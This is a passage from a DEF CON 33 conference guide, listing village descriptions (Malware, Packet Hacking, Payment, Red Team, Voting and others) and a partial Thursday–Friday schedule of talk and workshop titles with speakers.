Beyond technical training, Malware Village fosters a strong community where researchers, enthusiasts, and professionals can connect. We welcome everyone—whether you're an artist creating malware-inspired art, a hardware researcher discovering unexpected connections to malware analysis, or a seasoned analyst reminiscing about early malware history. Even children can explore malware through Malmons (aka Malware Monsters by Lena Yu aka LambdaMamba), making cybersecurity education more accessible.

At its core, Malware Village is about uniting people—newcomers and experts alike—with a shared mission: understanding, analyzing, and defending against malware to protect society.

Links:
    Website - https://malwarevillage.org/
    Mastodon (@malwarevillage@defcon.social) - https://defcon.social/@malwarevillage

Return to Index

PHV - Packet Hacking Village

PHV Village: Talk List
Home Page: https://www.wallofsheep.com/
DC Village Page: #orga_40737
DC Discord Chan: https://discord.com/channels/708208267699945503/708242376883306526
Location: LVCCWest-Level3-W303-W310 - Map
Social Media Links:
   TW @wallofsheep
   FB @wallofsheep
   YT https://youtube.com/wallofsheep
   TI @wallofsheep
   PS https://www.periscope.tv/wallofsheep
         https://defcon.social/@wallofsheep
   IG @wallofsheep


The Packet Hacking Village at DEF CON provides a community learning experience for people of all skill levels, from absolute beginners to seasoned professionals. While DEF CON is made up of dozens of small community-of-interest villages, we are one of the largest and most well known. We host practical training, network forensics and analysis games, and the renowned Capture The Packet event, which has been a Black Badge contest over 10 times and draws world-class hackers from around the world. Our mission has always been simple: to teach people good internet safety practices, and to provide an atmosphere that encourages everyone to explore and learn.

We provide a welcoming environment for hackers of all skill levels and backgrounds to network, learn new things, and be active participants in DEF CON. Our famous “Wall of Sheep” provides a fun and interactive take on internet security and privacy, while our contests Packet Inspector, Packet Detective, and Capture The Packet serve as a zero-to-hero pathway for individuals to learn network security, packet analysis, and delve into advanced security topics. Every year we strive to bring something new and innovative to DEF CON, whether it’s never-seen-before talks or creative games to teach and test skills.

Links:
    Website - https://www.wallofsheep.com
    Mastodon (defcon.social) - https://defcon.social/@wallofsheep

Return to Index

PLV - Policy Village

PLV Village: Talk List
Home Page: https://defcon.org/policy/
DC Village Page: #orga_40740
Location: LVCCWest-Level2-W234 - Map
Social Media Links:
   TW @DEFCONPolicy
         link
         https://defcon.social/@defconpolicy


The DEF CON community understands that creating a safer digital society requires collaboration between security and policy experts. Policy @ DEF CON provides a space for representatives of all areas of security to come together to educate and engage each other.

Tech policy is being written as we speak and we believe that including diverse expert voices will improve outcomes and help to bridge gaps between technical and policy practitioners. Senior government officials, nonprofit and private sector experts, security researchers, hackers, academics and technologists from around the world all come together at Policy @ DEF CON.

Links:
    Mastodon (defcon.social) - https://defcon.social/@defconpolicy
    Website - https://defcon.org/policy/

Return to Index

PSV - Physical Security Village

PSV Village: Talk List
Home Page: https://www.physsec.org/
DC Village Page: #orga_40970
DC Discord Chan: https://discord.com/channels/708208267699945503/732732893830447175
Location: LVCCWest-Level1-Hall2-W804 - Map
Social Media Links:
   TW @physsec
   TI @bypassvillage
   LI @physsec
         https://defcon.social/@physsec


Physical security is an important aspect to think about when considering securing your facility. The Physical Security Village provides an important opportunity to learn about real-world threats, hands-on mitigation techniques, and best practices for protecting assets. Our village brings together experts, practitioners, and enthusiasts to share knowledge through interactive demos, talks, and discussions. Whether you're new to physical security or a seasoned professional, you'll find valuable insights and practical skills.

Links:
    Mastodon (@physsec/media@defcon.social) - https://defcon.social/@physsec/media
    Website - https://physsec.org

Return to Index

PYV - Payment Village

PYV Village: Talk List
Home Page: https://www.paymentvillage.org/
DC Village Page: #orga_40738
DC Discord Chan: https://discord.com/channels/708208267699945503/732733473558626314
Location: LVCCWest-Level1-Hall2-W505 - Map
Social Media Links:
   TW @paymentvillage
   TI @paymentvillage
   YT link
         https://t.me/paymentvillage


Come to the Payment Village to learn about payment technologies! Payments play a crucial role in our daily lives, yet many of us lack an understanding of how they work. Our mission is to educate and cultivate the next generation of payment security experts and to foster open discussions around payments. We want to raise the bar in payment security! We invite you to explore the history of payments and to learn how modern-day payments work.

The village is jam-packed with hands-on experiences and exciting challenges! Unsure of where to start? Register for one of our workshops to acquire new skills or attend a talk by one of our carefully chosen experts. Already a pro? Pick up a Payment Village credit card to take part in our contest! Looking for unique challenges? Take home all the money from our cash-grab machine or have a go at our scavenger hunt!

As if that is not enough, this year we have created the largest badge EVER at DEF CON, our vulnerable ATM badge. We are bringing ATM hacking to the masses; our badge simulates an ATM attack surfaces in a physical form factor you can carry with two hands! not a forklift truck.

Links:
    Website - https://www.paymentvillage.org/
    Mastodon (@paymentvillage@mastodon.social) - https://mastodon.social/@paymentvillage

Return to Index

QTV - Quantum Village

QTV Village: Talk List
Home Page: https://quantumvillage.org/
DC Village Page: #orga_40741
Location: LVCCWest-Level1-Hall1-W206 - Map
Social Media Links:
   TW @quantum_village
   DC https://discord.gg/6WUjH5cBXu
   LI @quantumvillage
   YT https://youtube.com/@quantum_village/


Quantum Village Returns with our Year of Quantum Edition @ DEF CON 33!! Our theme this year is “Sense and Security” and we are bringing some amazing talks, workshops, demos, and hands-on activities to this year’s incredible Quantum Village! Come and find out how to hack quantum computers, learn more about quantum technologies, and meet the engineers and scientists who are building the machines that manipulate the quantum world. We also introduce the world’s first hackable, fully open sourced diamond-based quantum sensing platform - and we’ll be showing some of the amazing things it can do! We have quantum computers, quantum sensors, The OG Quantum CTF, quantum art (and artists), and all you need to prepare for the quantum future!

Links:
    Website - https://quantumvillage.org/

Return to Index

RCV - Recon Village

RCV Village: Talk List
Home Page: https://www.reconvillage.org/
DC Village Page: #orga_40743
DC Discord Chan: https://discord.com/channels/708208267699945503/732733566051418193
Location: LVCCWest-Level1-Hall2-W603 - Map
Social Media Links:
   TW @ReconVillage
   FB @reconvillage
   YT https://www.youtube.com/reconvillage/


Recon Village is an Open Space with Talks, Live Demos, Workshops, Discussions, CTFs, etc., with a common focus on Reconnaissance. The core objective of this village is to spread awareness about the importance of reconnaissance and open-source intelligence (OSINT) and demonstrate how even a small piece of information about a target can cause catastrophic damage to individuals and organizations.

As recon is a vital phase for infosec as well as investigations, folks should have this skill set in their arsenal. People should check out Recon Village, as they get to learn novel point/recon techniques, play hands-on CTF, participate in Live Recon, and, most of all, have fun. At RV, we keep things simple, and the focus is on generating quality content using talks, workshops, CTF, live hacking, hackathons, and other hands-on activities, etc.

We also run fun and hands-on live competitions where participants learn while they play.

Links:
    Website - https://reconvillage.org/
    Mastodon (@reconvillage@defcon.social) - https://defcon.social/@reconvillage

Return to Index

RFV - Radio Frequency Village

RFV Village: Talk List
Home Page: https://rfhackers.com/
DC Village Page: #orga_40742
DC Discord Chan: https://discord.com/channels/708208267699945503/732732595493666826
Location: LVCCWest-Level1-Hall2-W803 - Map
Social Media Links:
   TW @rfhackers
   TW @rf_ctf
         link
   DC https://discordapp.com/invite/JjPQhKy


After 17 years of evolution, from the WiFi Village, to the Wireless Village, RF Hackers Sanctuary presents: The Radio Frequency Village at DEFCON 32. The Radio Frequency Village is an environment where people come to learn about the security of radio frequency (RF) transmissions, which includes wireless technology, applications of software defined radio (SDR), Bluetooth (BT), Zigbee, WiFi, Z-wave, Radio Frequency Identification (RFID), Infrared (IR) and other protocols within the usable RF spectrum. As a security community we have grown beyond WiFi, and even beyond Bluetooth and Zigbee. The RF Village includes talks on all manner of radio frequency command and control as well as communication systems. While everyone knows about the WiFi and Bluetooth attack surfaces, most of us rely on many additional technologies every day. RF Hackers Sanctuary is supported by a group of experts in the area of information security as it relates to RF technologies. RF Hackers Sanctuary’s common purpose is to provide an environment in which participants may explore these technologies with a focus on improving their skills through offense and defense. These learning environments are provided in the form of guest speakers, panels, and Radio Frequency Capture the Flag games, to promote learning on cutting edge topics as it relates to radio communications. We promise to still provide free WiFi.

Co-located with the RF Village is the RF Capture the Flag. Come for the talks, stay for the practice and the competition.

Who runs this thing?

RF Hackers Sanctuary is a group of all volunteers with expertise in radio security and various other related fields. We are the original creators of the WiFi Capture the Flag, Wireless Capture the Flag, and RF Capture the Flag. We are the original founders of the WiFi Village, Wireless Village, and RF Village. Often imitated, never duplicated.

Links:
    Website - https://rfhackers.com/

Return to Index

RTV - Red Team Village

RTV Village: Talk List
Home Page: https://redteamvillage.io/
DC Village Page: #orga_40744
Location: LVCCWest-Level1-Hall1-W405-Red Team Village - Map
Social Media Links:
   TW @RedTeamVillage_
   YT https://www.youtube.com/redteamvillage
   TI @redteamvillage
   DC https://discord.gg/redteamvillage


The Red Team Village is focused on training the art of critical thinking, collaboration, and strategy in offensive security. The RTV brings together information security professionals to share new tactics and techniques in offensive security.

Links:
    Website - https://redteamvillage.io/

Return to Index

SEV - Social Engineering Village

SEV Village: Talk List
Home Page: https://www.se.community/
DC Village Page: #orga_40745
DC Discord Chan: https://discord.com/channels/708208267699945503/732733952867172382
Location: LVCCWest-Level3-W317-W319 - Map
Social Media Links:
   TW @sec_defcon
   YT link
   TI @se_community
   LI @social-engineering-community
   FB @Social-Engineering-Community-108883855139272


The Social Engineering Community is formed by a group of individuals who have a passion to enable people of all ages and backgrounds interested in Social Engineering with a venue to learn, discuss, and practice this craft. We plan to use this opportunity at DEF CON to present a community space that offers those elements through panels, research opportunities, and contests in order to act as a catalyst to foster discussion, advance the craft and create a space for individuals to expand their network. DEF CON attendees can either participate in these events, or they can watch the events unfold and learn about Social Engineering as an audience member. We plan to accomplish the above by bringing together passionate individuals to have a shared stake in building this community.

Links:
    Website - https://www.se.community/

Return to Index

SOC - Social Activities: Parties/Meetups

SOC Village: Talk List

Return to Index

TCV - Telecom Village

TCV Village: Talk List
Home Page: https://telecomvillage.com/
DC Village Page: #orga_40747
Location: LVCCWest-Level2-W224 - Map
Social Media Links:
   TW @TelecomVillage


At Telecom Village, our mission is to cultivate critical and innovative thinking in telecom security, with a strong focus on 5G networks. We offer a structured learning approach that enables participants to:

Our goal is to bridge the gap between theory and real-world application, equipping participants with the expertise to navigate and counter emerging telecom security challenges effectively. Through guided research, hands-on learning, and continuous exploration, we foster a community of skilled professionals ready to tackle the evolving telecom landscape.

Links:
    Website - https://telecomvillage.com/

Return to Index

VMV - Voting Village

VMV Village: Talk List
Home Page: https://votingvillage.org/
DC Village Page: #orga_40748
DC Discord Chan: https://discord.com/channels/708208267699945503/732733881148506164
Location: LVCCWest-Level2-W222-W223 - Map
Social Media Links:
   TW @votingvillagedc
   YT link
   TI @votingvillagedc
   LI @election-integrity-foundation
   IG @votingvillage?igsh=MWJreTh6dGl3eDEzNg==


The [Voting Village](https://votingvillage.org) has been an annual event since 2017 that provides hands-on opportunities to understand and analyze voting system hardware and software. Before the Voting Village, ordinary technologists and citizens had no access to the systems that run our election infrastructure. As the only open environment that gives the public hands-on access to their election systems, it is a critical antidote to rampant misinformation about election security and provides an opportunity to strengthen these systems against malicious attacks. The Voting Village is brought to you by our 501(c)3 tax exempt not for profit organization, the Election Integrity Foundation, EIN: 83-4089169.

The Voting Village has been invited to testify to Congress several times about how to strengthen election infrastructure. Conversely, we have drawn fire from voting system manufacturers, prompting a bipartisan group of senators to co-sign a public letter defending the Voting Village against some of the largest voting machine companies in 2018.

Even between presidential election cycles, expanding the reach of the Voting Village and providing education about how our election systems work is critical to democracy.

Links:
    Website - https://votingvillage.org/

Return to Index

WS - DEF CON Workshops

WS Village: Talk List
Home Page: https://defcon.org/html/defcon-33/dc-33-workshops.html
Sched Page: https://defcon.outel.org/defcon33/dc33-consolidated_page.html#villist_WS

Return to Index

Talk/Event Schedule


Thursday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Thursday - 06:00 PDT


Return to Index  -  Locations Legend
MISC - Defcon.run -

 

Thursday - 07:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(06:00-07:59 PDT) - Defcon.run -

 

Thursday - 08:00 PDT


Return to Index  -  Locations Legend
MISC - Human Registration Open -

 

Thursday - 09:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Lost & Found -

 

Thursday - 10:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -

 

Thursday - 11:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -

 

Thursday - 12:00 PDT


Return to Index  -  Locations Legend
CON - Hac-Man - Remote play available -
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -
PGE - Friends of Bill W -

 

Thursday - 13:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -

 

Thursday - 14:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -

 

Thursday - 15:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -
MISC - Toxic BBQ -

 

Thursday - 16:00 PDT


Return to Index  -  Locations Legend
DDV - DDV starts accepting drives for duplication -
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -
MISC - cont...(15:00-20:59 PDT) - Toxic BBQ -
PGE - DEF CON Holland Group Presents: 
Drinking with the Dutch -

 

Thursday - 17:00 PDT


Return to Index  -  Locations Legend
DDV - cont...(16:00-18:59 PDT) - DDV starts accepting drives for duplication -
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -
MISC - cont...(15:00-20:59 PDT) - Toxic BBQ -
PGE - Friends of Bill W -
PGE - cont...(16:00-18:59 PDT) - DEF CON Holland Group Presents: 
Drinking with the Dutch -

 

Thursday - 18:00 PDT


Return to Index  -  Locations Legend
DDV - cont...(16:00-18:59 PDT) - DDV starts accepting drives for duplication -
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(09:00-18:59 PDT) - Lost & Found -
MISC - cont...(15:00-20:59 PDT) - Toxic BBQ -
PGE - cont...(16:00-18:59 PDT) - DEF CON Holland Group Presents: 
Drinking with the Dutch -

 

Thursday - 19:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(15:00-20:59 PDT) - Toxic BBQ -
PGE - DC702 Meetup -
PGE - (19:30-22:30 PDT) - The KEVOPS Sellout Pool Party -

 

Thursday - 20:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(15:00-20:59 PDT) - Toxic BBQ -
PGE - cont...(19:00-20:59 PDT) - DC702 Meetup -
PGE - cont...(19:30-22:30 PDT) - The KEVOPS Sellout Pool Party -

 

Thursday - 21:00 PDT


Return to Index  -  Locations Legend
PGE - cont...(19:30-22:30 PDT) - The KEVOPS Sellout Pool Party -

 

Thursday - 22:00 PDT


Return to Index  -  Locations Legend
PGE - cont...(19:30-22:30 PDT) - The KEVOPS Sellout Pool Party -

Friday


This Schedule is tentative and may be changed at any time. Check at an Info Booth for the latest.

 

Friday - 06:00 PDT


Return to Index  -  Locations Legend
MISC - Defcon.run -
PGE - Cycle Override -

 

Friday - 07:00 PDT


Return to Index  -  Locations Legend
MISC - cont...(06:00-07:59 PDT) - Defcon.run -
PGE - cont...(06:00-10:59 PDT) - Cycle Override -

 

Friday - 08:00 PDT


Return to Index  -  Locations Legend
MISC - Human Registration Open -
PGE - cont...(06:00-10:59 PDT) - Cycle Override -
RTV - (08:30-09:59 PDT) - Cyber Wargames: King of the Hill -
SEV - (08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - (08:30-08:59 PDT) - Social Engineering Community Village Greeting and 2025 Badge Overview - Brent "TheDukeZip" Dukes

 

Friday - 09:00 PDT


Return to Index  -  Locations Legend
DCW - Whitebox Web Exploit Dev (WWED) - Cale "calebot" Smith,Luke Cycon,Young Seuk Kim,Priyanka Joshi
DCW - Effectively Detecting Modern Malware with Volatility 3 - Andrew Case,Lauren Pace,Daniel Donze
DCW - Open Source Malware 101 - Everything you always wanted to know about npm malware (and more) - Paul "6mile" McCarty
DCW - Introduction to Cryptographic Attacks - Matt Cheung
DCW - Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk - Or Eshed,Aviad Gispan
DCW - Accelerating Malware Analysis with WinDbg Time Travel Debugging - Joshua "jstrosch" Stroschein,Jae Young Kim
DCW - SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor - Lior Adar,Chen Levy Ben Aroy
DCW - Medical Device Hacking: 201 - Michael "v3ga" Aguilar,Alex "cheet" Delifer
DL - Dyna - Automating the OWASP MASTG with Offensive Android Tactics - Arjun "T3R4_KAAL" Chaudhary,Ayodele Ibidapo
DL - Spotter - Universal Kubernetes Security Scanner and Policy Enforcer - Madhu "madhuakula" Akula
DL - RETCON - Reticulum Embedded Turnkey Connection Operating Node - Daniel "Varx" Beard
DL - TheTimeMachine - Arjun "T3R4_KAAL" Chaudhary,Anmol "Fr13nd0x7f" K. Sachan
DL - SAMLSmith - Eric Woodruff,Tomer Nahum
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
PGE - cont...(06:00-10:59 PDT) - Cycle Override -
RTV - Cyber Wargames: Strategic Operations -
RTV - cont...(08:30-09:59 PDT) - Cyber Wargames: King of the Hill -
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - SEC Vishing Competition (SECVC) -

 

Friday - 10:00 PDT


Return to Index  -  Locations Legend
- LHC First Time DEF CON Meetup -
- LHC Capture the Flag -
- Sticker Swap -
BBV - Secret Life of an Automationist: Engineering the Hunt - Gunnar "g0lden" Andrews
BBV - Prompt. Scan. Exploit: AI’s Journey Through Zero-Days and a Thousand Bugs - Diego "djurado" Jurado,Joel "niemand_sec" Noguera
BBV - Becoming a Caido Power User - Justin "rhynorater" Gardner
BHV - (10:30-10:59 PDT) - Quantum-Resistant Healthcare - Katarina Amrichova
CON - Aw, man...pages! -
CON - Hac-Mac Contest Booth Open -
CPV - Crypto Privacy Village: Welcome - Crypto Privacy Village Staff
CRE - AML Cryptocurrency Compliance - Joseph,Chelsea Button
CRE - WipeOut XL hi-score tournament -
CRE - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - (10:15-10:59 PDT) - Silent Sabotage: How Nation-State Hackers Turn Human Error into Catastrophic Failures - Nathan Case,Jon McCoy
CRE - Memorial Chamber Open -
DCT - Welcome to DEF CON 33! - Jeff "The Dark Tangent" Moss
DCT - (10:30-11:15 PDT) - DC101 Panel -
DCT - Remote code execution via MIDI messages - Anna portasynthinca3 Antonenko
DCT - BitUnlocker: Leveraging Windows Recovery to Extract BitLocker Secrets - Alon "alon_leviev" Leviev,Netanel Ben Simon
DCT - Paywall Optional: Stream for Free with a New Technique, Recursive Request Exploits (RRE) - Farzan Karimi
DCT - (10:30-11:15 PDT) - No VPN Needed? Cryptographic Attacks Against the OPC UA Protocol - Tom Tervoort
DCT - The One Bitcoin Heist: Making a custom Hashcat module to solve a decade-old puzzle challenge - Joseph "stoppingcart" Gabay
DCW - cont...(09:00-12:59 PDT) - Whitebox Web Exploit Dev (WWED) - Cale "calebot" Smith,Luke Cycon,Young Seuk Kim,Priyanka Joshi
DCW - cont...(09:00-12:59 PDT) - Effectively Detecting Modern Malware with Volatility 3 - Andrew Case,Lauren Pace,Daniel Donze
DCW - cont...(09:00-12:59 PDT) - Open Source Malware 101 - Everything you always wanted to know about npm malware (and more) - Paul "6mile" McCarty
DCW - cont...(09:00-12:59 PDT) - Introduction to Cryptographic Attacks - Matt Cheung
DCW - cont...(09:00-12:59 PDT) - Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk - Or Eshed,Aviad Gispan
DCW - cont...(09:00-12:59 PDT) - Accelerating Malware Analysis with WinDbg Time Travel Debugging - Joshua "jstrosch" Stroschein,Jae Young Kim
DCW - cont...(09:00-12:59 PDT) - SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor - Lior Adar,Chen Levy Ben Aroy
DCW - cont...(09:00-12:59 PDT) - Medical Device Hacking: 201 - Michael "v3ga" Aguilar,Alex "cheet" Delifer
DDV - DDV open and accepting drives for duplication -
DL - AIMaL - Artificially Intelligent Malware Launcher - Endrit Shaqiri,Natyra Shaqiri
DL - AirBleed - Covert Bluetooth Plist Payload Injection - Ray "CURZE$" Cervantes,Yvonne "Von Marie" Cervantes
DL - RETCON - Reticulum Embedded Turnkey Connection Operating Node - Daniel "Varx" Beard
DL - Attack Flow and Root Cause Discovery - No LLMs, No Queries, Just Explainable ML - Ezz Tahoun,Kevin Shi
DL - SAMLSmith - Eric Woodruff,Tomer Nahum
ICSV - (10:30-10:59 PDT) - Hull Integrity: Applying MOSAICS to Naval Mission Systems - Michael Frank
ICSV - Safeguarding the Industrial Frontier: OT SOC & Incident Response - Adam Robbie
ICSV - Fear vs. Physics: Diagnosing Grid Chaos - Emma Stewart
IOTV - (10:30-10:59 PDT) - 10 Years of IoT Village: Insights in the World of IoT - Stephen Bono,Rachael Tubbs
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - Lost & Found -
MISC - (10:30-11:30 PDT) - AixCC Award Announcement -
MISC - Book Signing - Adversary Emulation with MITRE ATT&CK - Drinor Selmanaj - Drinor Selmanaj
MISC - Book Signing - Cyber Calendar 2026 - Chris DeCarmen/Squared Away LLC - Chris DeCarmen
MWV - Break Systems, Not Promises: I promised to do a keynote at DEF CON - Lena "LambdaMamba" Yu
MWV - Getting started in Malware Analysis with Ghidra - Wesley McGrew
MWV - (10:40-11:10 PDT) - Malware Matryoshka: Nested Obfuscation Techniques - Brian Baskin
PAYV - (10:15-10:30 PDT) - Intro to village - Leigh-Anne Galloway
PAYV - (10:30-10:59 PDT) - Card testing workshop - Vince Sloan
PGE - cont...(06:00-10:59 PDT) - Cycle Override -
QTV - QC Intro - Sohum Thakkar
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(09:00-11:59 PDT) - SEC Vishing Competition (SECVC) -

 

Friday - 11:00 PDT


Return to Index  -  Locations Legend
- cont...(10:00-12:59 PDT) - Sticker Swap -
- cont...(10:00-11:59 PDT) - LHC Capture the Flag -
ADV - From adversarial to aligned, redefining purple teaming for maximum impact - Adam Pennington,Sydney Marrone,Lauren Proehl
BBV - Attacking AI - Jason "jhaddix" Haddix
BHV - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
CON - cont...(10:00-11:59 PDT) - Aw, man...pages! -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CRE - cont...(10:00-11:50 PDT) - AML Cryptocurrency Compliance - Joseph,Chelsea Button
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - Cryptocurrency Opening Keynote - Michael "MSvB" Schloh von Bennewitz,Chad Calease,Param D Pithadia
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - cont...(10:30-11:15 PDT) - DC101 Panel -
DCT - Virtualization-Based (In)security - Weaponizing VBS Enclaves - Ori David
DCT - cont...(10:30-11:15 PDT) - No VPN Needed? Cryptographic Attacks Against the OPC UA Protocol - Tom Tervoort
DCT - (11:30-12:15 PDT) - ChromeAlone: Transforming a Browser into a C2 Platform - Michael "bouncyhat" Weber
DCT - Inside Look at a Chinese Operational Relay Network - Michael "mtu" Torres,Zane "earl" Hoffman
DCW - cont...(09:00-12:59 PDT) - Whitebox Web Exploit Dev (WWED) - Cale "calebot" Smith,Luke Cycon,Young Seuk Kim,Priyanka Joshi
DCW - cont...(09:00-12:59 PDT) - Effectively Detecting Modern Malware with Volatility 3 - Andrew Case,Lauren Pace,Daniel Donze
DCW - cont...(09:00-12:59 PDT) - Open Source Malware 101 - Everything you always wanted to know about npm malware (and more) - Paul "6mile" McCarty
DCW - cont...(09:00-12:59 PDT) - Introduction to Cryptographic Attacks - Matt Cheung
DCW - cont...(09:00-12:59 PDT) - Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk - Or Eshed,Aviad Gispan
DCW - cont...(09:00-12:59 PDT) - Accelerating Malware Analysis with WinDbg Time Travel Debugging - Joshua "jstrosch" Stroschein,Jae Young Kim
DCW - cont...(09:00-12:59 PDT) - SnowGoat: Exposing Hidden Security Risks and Leaking Data Like a Threat Actor - Lior Adar,Chen Levy Ben Aroy
DCW - cont...(09:00-12:59 PDT) - Medical Device Hacking: 201 - Michael "v3ga" Aguilar,Alex "cheet" Delifer
DDV - cont...(10:00-16:59 PDT) - DDV open and accepting drives for duplication -
DL - Blackdagger - Cyber Workflow Automation Framework - Mahmut "ErdemOzgen" Erdem Ozgen,Ata Seren
DL - BOAZ - A Multilayered Approach to AV/EDR Evasion Engineering - Thomas "XM20" Xuan Meng
DL - C4 - Cross Compatible Command and Control - Scott "ScottCTaylor12" Taylor
DL - Caldera for OT - Oops! All Software - Devon Colmer,Tony Webber
DL - rev.ng Decompiler - Pietro Fezzardi,Alessandro Di Federico
IOTV - (11:45-12:30 PDT) - Never enough about cameras - The firmware encryption keys hidden under the rug - Alexandru Lazar
IOTV - Go Malware Meets IoT: Challenges, Blind Spots, and Botnets - Asher Davila
MISC - cont...(08:00-18:59 PDT) - Human Registration Open -
MISC - cont...(10:30-11:30 PDT) - AixCC Award Announcement -
MISC - Book Signing - Jon DiMaggio/ No Starch Press - Jon DiMaggio
MISC - Book Signing - Supply Chain Software Security-AI, IoT and Application Security - Aamiruddin Syed/Apres Media LLC - Aamiruddin Syed
MWV - cont...(10:00-12:59 PDT) - Getting started in Malware Analysis with Ghidra - Wesley McGrew
MWV - cont...(10:40-11:10 PDT) - Malware Matryoshka: Nested Obfuscation Techniques - Brian Baskin
MWV - (11:20-11:50 PDT) - Cryptography is hard: Breaking the DoNex ransomware - Gijs Rijnders
PAYV - BT hacking - Dan Bongiorno
PAYV - Carding is Dead, Long Live Carding: How MaaS is fueling NFC relay attacks - Federico Valentini,Alessandro Strino
PAYV - More is less -
PLV - State of Open Source in the Federal Government - Jordan Kasper
PLV - (11:45-12:30 PDT) - Dark Capabilities: When Tech Companies Become Threat Actors - Tom Cross,Greg Conti
RTV - cont...(09:00-14:59 PDT) - Cyber Wargames: Strategic Operations -
RTV - Mind vs. Machine: Finding the Sweet Spot in Modern Red Teaming - Ben "nahamsec" Sadeghipour,Ryan "0day" Montgomery,Tyler Ramsbey,William Giles
SEV - cont...(08:30-17:59 PDT) - Social Engineering Community Village - Village Open -
SEV - cont...(09:00-11:59 PDT) - SEC Vishing Competition (SECVC) -

 

Friday - 12:00 PDT


Return to Index  -  Locations Legend
- cont...(10:00-12:59 PDT) - Sticker Swap -
BBV - Voices from the Frontlines: Managing Bug Bounties at Scale - Gabriel Nitu,Jay Dancer,Tyson Laa Deng,Ryan Nolette,Goshak
BBV - Nuclei: Beyond The Basic Templates - Ben "nahamsec" Sadeghipour,Adam "BuildHackSecure" Langley
BHV - cont...(11:00-15:59 PDT) - accessDenied: Step Into the Scenario. Deal the Consequences. - Jack Voltaic
CHV - (12:30-12:59 PDT) - How API flaws led to admin access to over 1,000 USA dealers and control over your car - Eaton Zveare
CON - Kubernetes Learning CTF (Non-competitive) w/ Support -
CON - cont...(10:00-17:59 PDT) - Hac-Mac Contest Booth Open -
CPV - Behind The Dashboard - (Lack Of) Automotive Privacy - Lior ZL,Jacob Avidar
CPV - (12:30-12:59 PDT) - Back to Basics: Building Resilient Cyber Defenses - Yael Grauer
CRE - Red Teaming Financial Defenses - Wei Hong,Chloe Chong
CRE - cont...(10:00-17:59 PDT) - WipeOut XL hi-score tournament -
CRE - cont...(10:00-17:59 PDT) - Career Fair: Interview Tips and Referral - Krity Kharbanda,Aastha Sahni
CRE - Tunnelpocalypse - Rich Compton
CRE - cont...(10:00-17:59 PDT) - Memorial Chamber Open -
DCT - (12:30-13:15 PDT) - Ghosts in the Machine Check - Conjuring Hardware Failures for Cross-ring Privilege Escalation - Christopher "xoreaxeaxeax" Domas
DCT - Ghost Calls: Abusing Web Conferencing for Covert Command & Control - Adam "UNC1739" Crosser
DCT - Safe Harbor or Hostile Waters: Unveiling the Hidden Perils of the TorchScript Engine in PyTorch - Ji'an "azraelxuemo" Zhou,Lishuo "ret2ddme" Song
DCT - cont...(11:30-12:15 PDT) - ChromeAlone: Transforming a Browser into a C2 Platform - Michael "bouncyhat" Weber
DCT - (12:30-13:15 PDT) - Cash, Drugs, and Guns: Why Your Safes Aren't Safe - Mark Omo,James Rowley
DCT - The Ultimate Hack: Applying Lessons Learned from the loss of TITAN to Maritime Cybersecurity - Rear Admiral John Mauger
DCT - (12:30-13:15 PDT) - Edge of Tomorrow: Foiling Large Supply Chain Attacks By Taking 5k Abandoned S3 Buckets from Malware and Benign Software - Maksim Shudrak
DCW - cont...(09:00-12:59 PDT) - Whitebox Web Exploit Dev (WWED) - Cale "calebot" Smith,Luke Cycon,Young Seuk Kim,Priyanka Joshi
DCW - cont...(09:00-12:59 PDT) - Effectively Detecting Modern Malware with Volatility 3 - Andrew Case,Lauren Pace,Daniel Donze
DCW - cont...(09:00-12:59 PDT) - Open Source Malware 101 - Everything you always wanted to know about npm malware (and more) - Paul "6mile" McCarty
DCW - cont...(09:00-12:59 PDT) - Introduction to Cryptographic Attacks - Matt Cheung
DCW - cont...(09:00-12:59 PDT) - Inside the Threat: Designing and Deploying Malicious Browser Extensions to Understand Their Risk - Or Eshed,Aviad Gispan
